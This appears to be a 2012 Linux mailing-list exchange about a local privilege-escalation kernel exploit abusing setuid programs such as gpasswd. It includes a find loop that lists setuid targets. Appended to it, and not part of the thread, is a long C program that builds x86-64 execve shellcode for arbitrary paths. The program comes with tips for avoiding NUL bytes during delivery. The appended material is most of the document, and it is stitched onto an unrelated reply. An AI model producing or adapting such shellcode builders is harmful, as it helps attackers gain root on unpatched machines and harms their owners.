On Thu, Jan 26, 2012 at 4:52 AM, Martti Kühne <mysatyre@gmail.com> wrote:
> On Tue, Jan 24, 2012 at 10:41:10AM +0530, Jayesh Badwaik wrote:
>> Hi,
>> I have just discovered this kernel exploit which allows a local user to obtain root privileges. The detailed explanation is given at [1]. A patch has apparently already gone into the kernel (according to the blog post), but that update has not yet reached Arch Linux. And while /bin/su is fine and not vulnerable to the exploit, gpasswd is vulnerable, and I am able to carry out the exploit on my computer right now using gpasswd. The list of programs that may be vulnerable is given by the following command
>>
>>     [user@localhost]$ for p in $(echo $PATH | tr ':' ' '); do find "$p" -perm -4005; done
>>
>> which on my system gives the following list [3]
>
> Wow, I'm really interested in this, how would I go about modifying the shellcode to push one of those paths onto the stack? AFAICT they don't fit into a qword like /bin/sh, do they?
>
> cheers! mar77i
Sorry if I misquoted before; I did not *discover* it, rather I stumbled upon it on the internet. I realized my error, but later I thought the issue was too widespread for me to be misunderstood. So maybe you'd be better off contacting the original author (see the blog, link [1] in my post).

--
Cheers
Jayesh Vinay Badwaik
Electronics and Communication Engineering
VNIT, INDIA
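Martti's question about paths that do not fit in one qword, worked through as an added example (this is not code from the thread, nor from the blog post it links to). The usual answer is to split the NUL-terminated path into 8-byte little-endian chunks and push them in reverse order, so that after the last push rsp points at the start of the string exactly as it does for the single-qword "/bin/sh"; a path whose length is a multiple of 8 needs an extra zero qword pushed first as the terminator. The program below computes those chunks, assembles the corresponding `mov rax, imm64 ; push rax` bytes plus a generic x86-64 execve tail, and replays the pushes on a fake stack to check the result without executing anything. The path `/usr/bin/gpasswd` is an assumption for illustration; the `find` loop in the quoted message reports the real setuid binaries on a given system.

```c
/* Added example: encode an arbitrary path as stack pushes for x86-64 shellcode.
 * Not from the thread or the linked write-up; "/usr/bin/gpasswd" is assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_CHUNKS 8                 /* paths up to 63 bytes plus terminator */

/* Split `path` into 8-byte little-endian qwords, NUL-padded, stored in the
 * order they must be pushed (tail of the string first). Returns the number
 * of qwords, or 0 if the path does not fit in `max` chunks. A length that is
 * an exact multiple of 8 yields an extra all-zero qword as terminator. */
size_t path_to_push_chunks(const char *path, uint64_t *out, size_t max)
{
    size_t len = strlen(path);
    size_t nchunks = len / 8 + 1;    /* always leaves room for at least one NUL */
    if (nchunks > max)
        return 0;
    for (size_t i = 0; i < nchunks; i++) {
        uint64_t q = 0;
        for (size_t b = 0; b < 8; b++) {
            size_t pos = i * 8 + b;
            if (pos < len)
                q |= (uint64_t)(unsigned char)path[pos] << (8 * b);
        }
        out[nchunks - 1 - i] = q;    /* reversed: last chunk is pushed first */
    }
    return nchunks;
}

/* Emit "mov rax, imm64 ; push rax" for one qword, or "xor eax, eax ; push rax"
 * for zero so the terminator adds no NUL bytes. Returns bytes written. */
size_t emit_push_qword(uint64_t imm, uint8_t *buf)
{
    size_t n = 0;
    if (imm == 0) {
        buf[n++] = 0x31; buf[n++] = 0xC0;          /* xor eax, eax */
    } else {
        buf[n++] = 0x48; buf[n++] = 0xB8;          /* mov rax, imm64 */
        for (int b = 0; b < 8; b++)
            buf[n++] = (uint8_t)(imm >> (8 * b));  /* immediate is little-endian */
    }
    buf[n++] = 0x50;                               /* push rax */
    return n;
}

/* Full execve(path, NULL, NULL) shellcode for x86-64 Linux: the pushes, then
 * rdi = rsp, rsi = rdx = 0, rax = 59 (__NR_execve), syscall. Returns the
 * length, or 0 if the path is too long. `buf` needs MAX_CHUNKS*11 + 13 bytes. */
size_t build_execve_shellcode(const char *path, uint8_t *buf)
{
    uint64_t chunks[MAX_CHUNKS];
    size_t n = path_to_push_chunks(path, chunks, MAX_CHUNKS);
    if (n == 0)
        return 0;
    size_t len = 0;
    for (size_t i = 0; i < n; i++)
        len += emit_push_qword(chunks[i], buf + len);
    static const uint8_t tail[] = {
        0x48, 0x89, 0xE7,   /* mov rdi, rsp : pointer to the string just built */
        0x31, 0xF6,         /* xor esi, esi : argv = NULL */
        0x31, 0xD2,         /* xor edx, edx : envp = NULL */
        0x31, 0xC0,         /* xor eax, eax */
        0xB0, 0x3B,         /* mov al, 59   : __NR_execve */
        0x0F, 0x05          /* syscall */
    };
    memcpy(buf + len, tail, sizeof tail);
    return len + sizeof tail;
}

/* Replay the pushes on a fake stack and return what rsp would point at,
 * so the encoding can be verified without running it. */
const char *simulate_pushes(const uint64_t *chunks, size_t n,
                            uint8_t *stack, size_t stack_size)
{
    if (stack_size < n * 8)
        return NULL;
    size_t sp = stack_size;
    for (size_t i = 0; i < n; i++) {
        sp -= 8;
        for (int b = 0; b < 8; b++)
            stack[sp + b] = (uint8_t)(chunks[i] >> (8 * b));
    }
    return (const char *)(stack + sp);
}

int main(void)
{
    const char *path = "/usr/bin/gpasswd";   /* assumed; use what find reports */
    uint64_t chunks[MAX_CHUNKS];
    size_t n = path_to_push_chunks(path, chunks, MAX_CHUNKS);
    for (size_t i = 0; i < n; i++)
        printf("push 0x%016llx\n", (unsigned long long)chunks[i]);

    uint8_t stack[64];
    printf("rsp -> \"%s\"\n", simulate_pushes(chunks, n, stack, sizeof stack));

    uint8_t code[MAX_CHUNKS * 11 + 13];
    printf("%zu bytes of shellcode\n", build_execve_shellcode(path, code));
    return 0;
}
```

The zero qword is produced with `xor eax, eax` rather than `push 0` or `mov rax, 0` so the terminator does not introduce NUL bytes; that only matters if the delivery channel cannot carry them, which a raw write through a file descriptor can. The `find -perm -4005` loop lists setuid binaries that are also world-readable and world-executable; the path you feed into this encoder should come from that list, not from a guess.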